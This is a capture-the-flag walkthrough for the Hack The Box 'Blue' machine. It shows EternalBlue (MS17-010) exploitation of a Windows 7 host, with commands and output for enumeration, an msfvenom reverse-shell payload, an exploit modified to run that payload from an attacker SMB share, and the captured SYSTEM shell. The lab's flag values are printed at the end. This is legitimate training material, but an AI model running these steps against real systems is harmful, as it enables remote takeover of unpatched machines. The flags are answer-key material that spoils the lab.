Blue
7 minutes to read
- OS: Windows
- Difficulty: Easy
- IP Address: 10.10.10.40
- Release: 28 / 07 / 2017
Port scanning
# Nmap 7.92 scan initiated as: nmap -sC -sV -o nmap/targeted 10.10.10.40 -p 135,139,445,49152,49153,49154,49155,49156,49157
Nmap scan report for 10.10.10.40
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time:
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb2-time:
| date:
|_ start_date:
|_clock-skew: mean: -19m57s, deviation: 34m36s, median: 1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done -- 1 IP address (1 host up) scanned in 71.62 seconds
This machine has ports 135 (MS-RPC), 139 and 445 (SMB) open, within others.
$ crackmapexec smb 10.10.10.40
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
Enumeration
If we take a look at the version of SMB (SMBv1), with no signing, we know that we can perform an attack called EternalBlue (CVE-2017-0144). Also, the name of the machine (Blue) is a hint.
We are able to list some shares in SMB using a null session:
$ smbclient -L 10.10.10.40 -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Share Disk
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Let’s run the EternalBlue attack using MS17-010. For that, we need to use Python version 2.7. The best way is with a Docker container:
$ docker run -v "$(pwd):/opt" -it python:2.7 bash
root@2955c01b9358:/# cd /opt
root@2955c01b9358:/opt# cd MS17-010/
root@2955c01b9358:/opt/MS17-010# ls -la
total 204
drwxr-xr-x 22 root root 704 Jul 15 13:26 .
drwxr-xr-x 3 root root 96 Jul 15 13:26 ..
drwxr-xr-x 12 root root 384 Jul 15 13:26 .git
-rw-r--r-- 1 root root 27786 Jul 15 13:26 BUG.txt
-rw-r--r-- 1 root root 3367 Jul 15 13:26 README.md
-rw-r--r-- 1 root root 2495 Jul 15 13:26 checker.py
-rw-r--r-- 1 root root 25722 Jul 15 13:26 eternalblue_exploit7.py
-rw-r--r-- 1 root root 24079 Jul 15 13:26 eternalblue_exploit8.py
-rw-r--r-- 1 root root 3804 Jul 15 13:26 eternalblue_poc.py
-rw-r--r-- 1 root root 1544 Jul 15 13:26 eternalchampion_leak.py
-rw-r--r-- 1 root root 2591 Jul 15 13:26 eternalchampion_poc.py
-rw-r--r-- 1 root root 5936 Jul 15 13:26 eternalchampion_poc2.py
-rw-r--r-- 1 root root 1651 Jul 15 13:26 eternalromance_leak.py
-rw-r--r-- 1 root root 948 Jul 15 13:26 eternalromance_poc.py
-rw-r--r-- 1 root root 5107 Jul 15 13:26 eternalromance_poc2.py
-rw-r--r-- 1 root root 1865 Jul 15 13:26 eternalsynergy_leak.py
-rw-r--r-- 1 root root 3022 Jul 15 13:26 eternalsynergy_poc.py
-rw-r--r-- 1 root root 1110 Jul 15 13:26 infoleak_uninit.py
-rw-r--r-- 1 root root 16669 Jul 15 13:26 mysmb.py
-rw-r--r-- 1 root root 1846 Jul 15 13:26 npp_control.py
drwxr-xr-x 5 root root 160 Jul 15 13:26 shellcode
-rw-r--r-- 1 root root 43417 Jul 15 13:26 zzz_exploit.py
Now we need to install impacket
(pip install impacket
). Next, we can check that the machine is vulnerable using checker.py
:
root@2955c01b9358:/opt/MS17-010# python checker.py
checker.py <ip>
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED
It doesn’t appear to be vulnerable. But let’s use guest
as the username (we need to modify the script):
root@2955c01b9358:/opt/MS17-010# python checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)
Alright, much better.
SMB exploitation
At this moment, we can use zzz_exploit.py
to compromise the machine (we need to use guest
as username again):
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py
zzz_exploit.py <<p> [pipe_name]
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Using named pipe: browser
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008391048
InParam: 0xfffff8a00870115c
MID: 0x802
unexpected alignment, diff: 0x-370fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a008635048
InParam: 0xfffff8a00872a15c
MID: 0x807
unexpected alignment, diff: 0x-f5fb8
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087a5088
InParam: 0xfffff8a00873e15c
MID: 0x903
unexpected alignment, diff: 0x66088
leak failed... try again
CONNECTION: 0xfffffa8003e0e690
SESSION: 0xfffff8a003574a60
FLINK: 0xfffff8a0087b3088
InParam: 0xfffff8a0087ad15c
MID: 0x903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Done
Great, it worked. But it only created a file at C:\pwned.txt
. In order to get Remote Code Execution (RCE), we can expose a malicious binary file using an SMB server and run it:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.17.44 LPORT=4444 -f exe -o pwn.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7168 bytes
Saved as: pwn.exe
Now we need to modify a bit the exploit. Specifically, this function must be set like this:
def service_exec(a, v):
pass
def smb_pwn(conn, arch):
#smbConn = conn.get_smbconnection()
#print('creating file c:\\pwned.txt on the target')
#tid2 = smbConn.connectTree('C$')
#fid2 = smbConn.createFile(tid2, '/pwned.txt')
#smbConn.closeFile(tid2, fid2)
#smbConn.disconnectTree(tid2)
#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
service_exec(conn, r'cmd /c \\10.10.17.44\smbFolder\pwn.exe')
# Note: there are many methods to get shell over SMB admin session
# a simple method to get shell (but easily to be detected by AV) is
# executing binary generated by "msfvenom -f exe-service ..."
Then, we start the SMB server with smbserver.py
(Impacket) and run the exploit. If it does not work, we can use one of the pipes listed with checker.py
(samr
, lsarpc
, browser
…):
$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
root@2955c01b9358:/opt/MS17-010# python zzz_exploit.py 10.10.10.40 samr
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0080cc048
InParam: 0xfffff8a00872a15c
MID: 0x3803
unexpected alignment, diff: 0x-65efb8
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087b2088
InParam: 0xfffff8a0087a515c
MID: 0x3903
unexpected alignment, diff: 0xc088
leak failed... try again
CONNECTION: 0xfffffa80038c3020
SESSION: 0xfffff8a0085478a0
FLINK: 0xfffff8a0087d2088
InParam: 0xfffff8a0087cc15c
MID: 0x3903
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
Opening SVCManager on 10.10.10.40.....
Creating service zVPI.....
Starting service zVPI.....
The NETBIOS connection with the remote host timed out.
Removing service zVPI.....
ServiceExec Error on: 10.10.10.40
Unexpected answer from server: Got 46, Expected 47
Done
We receive the connection in the SMB server:
$ impacket-smbserver smbFolder "$(pwd)"
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.40,49197)
[*] AUTHENTICATE_MESSAGE (\,HARIS-PC)
[*] User HARIS-PC\ authenticated successfully
[*] :::00::aaaaaaaaaaaaaaaa
[-] Unknown level for query path info! 0x109
[-] Unknown level for query path info! 0x4
[-] Unknown level for query path info! 0x109
The binary pwn.exe
is run and we get a shell as nt authority\system
:
$ rlwrap ncat -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.40.
Ncat: Connection from 10.10.10.40:49198.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
At this point, we can read both user.txt
and root.txt
flags:
C:\Windows\system32>dir C:\Users
Volume in drive C has no label.
Volume Serial Number is BE92-053B
Directory of C:\Users
21/07/2017 07:56 <DIR> .
21/07/2017 07:56 <DIR> ..
21/07/2017 07:56 <DIR> Administrator
14/07/2017 14:45 <DIR> haris
12/04/2011 08:51 <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 2,691,747,840 bytes free
C:\Windows\system32>type C:\Users\haris\Desktop\user.txt
bb50fc9a421df6dc53a95fd7a5c4bfe6
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
fd999003d610c8fe77d56868651ba5d3